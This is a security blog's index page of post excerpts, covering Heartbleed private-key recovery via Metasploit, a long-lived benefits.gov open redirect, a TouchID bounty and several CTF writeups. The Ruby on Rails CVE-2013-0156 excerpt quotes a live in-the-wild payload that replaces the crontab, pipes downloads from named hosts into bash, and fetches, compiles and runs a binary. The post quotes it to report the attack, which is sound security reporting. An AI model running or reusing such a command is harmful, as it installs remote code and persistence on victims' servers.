Heartbleeding Private Keys via Metasploit

| Comments

I’ve resisted posting about Heartbleed, just because I don’t think there’s much more to be said, so I’ll keep this brief. By now you know that it allows for reading raw server memory including things like credentials, session tokens, and whatever else happens to be in the web server processes memory near where your request is allocated. This also includes encryption keys used to secure SSL/TLS sessions.

Thanks, at least in part, to Cloudflare’s challenge it’s been proven by a number of people that RSA private keys can be recovered with enough attempts, and a little math.

So what makes my successful attack different? I did it with a Metasploit module.

Open Redirect in benefits.gov for Eight Years

| Comments

While digging into some old phishing campaigns, I came across something interesting. It’s nothing earth-shattering, but the sheer length of time this vulnerability has remained viable, even after being identified in the press as actively exploited in the wild, is noteworthy.

You see, nearly eight years after being abused in a phishing campaign, the vulnerability is still present.

Hack My iPhone’s TouchID @ Derbycon - Win $100

| Comments

Just like the title says, if you’re the first to hack my iPhone 5s’ TouchID during Derbycon, I’ll give you $100.

The recently claimed IsTouchIDHackedYet bounty has be claimed by Starbug of the Chaos Computer Club and the corresponding video shows the technique. They used a scanner to create an image of a fingerprint from the iPhone’s touchscreen, made a dummy fingerprint out of wood glue, and used that dummy print to authenticate to touchID. Marc Rogers and others have reproduced the technique. So everything is laid bare, right?

Not quite.

OTP, Stream Ciphers, and Key Reuse

| Comments

During (and just prior to) DEF CON, |)ruid ran a series of challenges for entrance into his LOLBitcoin party. I decided to give them a shot, and thought I’d document my approach to one of the challenges here.

There were several different paths available, so that anyone could approach the challenges using whatever skills they felt were their strongest. I decided to go down ‘The Way of the Cryptologist’ and was met with a few challenges put together by Dan Crowley.

It’s the second of these which I’m describing here. Dan himself beat me to the punch with a solid writeup of his own, and a tool which he released to attack the challenge, and similarly flawed uses of crypto.

RoR CVE-2013-0156 in the Wild

| Comments

Ruby on Rails CVE-2013-0156 has recently been exploited in the wild. This vulnerability was the subject of much discussion, and an emergency RoR advisory back in January. It’s pretty suprising that it’s taken this long to surface in the wild, but less suprising that people are still running vulnerable installations of Rails. It also appears to be affected some web hosts

Exploit activity is reportedly sourcing from * 88.198.20.247 * 95.138.186.181 * 188.190.126.105

The payload consists of the following;

1
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Follow Up: BSJTF Packet Analysis Challenge

| Comments

Recently, I posted a blog about a CTF challenge I participated in that involved some packet analysis. Since then, I’ve had a chance to chat with @dth0m who wrote that challenge.

He had some very interesting things to say, which I thought warranted another entry.

If you haven’t read the previous post about this challenge, you might want to read that first.

BSJTF CTF Writeup - on the Rogue Agents Tail

| Comments

This is a guest post, mostly, from @drbearsec. I say mostly, because I’m formatting his words somewhat. I did not take part in this challenge, so the solve is totally the work of he and his crack CTF team (currently in 2nd place overall, and gaining). The team is compromised of @drbearsec, @essobi, @Babs0matic, and @j0hnnyxm4s.

For this challenge, teams were given a series of password hashes. Cracking them would yield the key.

BSJTF CTF Writeup - What in the Name of Zeus?

| Comments

Recently, I’ve been participating in some of the BSides Joint Task Force CTF challenges. This CTF is being put on by the organizers of the recent BSides Chicago and upcoming BSides Detroit. They’re spanning both conferences, and also releasing challenges online in between.

I thought I’d do a write up of one of these challenges, since it’s both a fun exercise and the way I solved it makes a good introduction to Ruby. If you’re never used Ruby, I encourage you to give it a try. It’s a powerful language, and I find it’s syntax to be extremely intuitive. Of course, there’s a number of ways to solve this challenge.

I’ll try to outline not only my path to solving this, but also some failed ideas, in the hopes that they’ll shed some light on my thought process.

Thanks to the BSJTF and especially to @dth0m for putting this challenge together.

Hello World

| Comments

I decided to try to try and get back on the blogging bandwagon. This will be where that happens.

I found my previous attempts encumbered by heavier blogging platforms that required a little more effort to work with. This left me putting off various posts until eventually they just didn’t happen at all. For this attempt, I’m trying Octopress. So far, I’m happy with it.

Octopress has a number of features that I like over other platforms I’ve tried in the past:

  • Static content generation (Less attack surface)
  • Markdown formatting for posts
  • Rake integration for creating posts, pages, etc..
  • Github Pages support
  • Git workflow for pushing updates, etc.

In short, it’s lighter weight and fits better with tools I already use frequently. This should make it less burdensome and thus lead to more posts from me. Or at least, that’s the plan.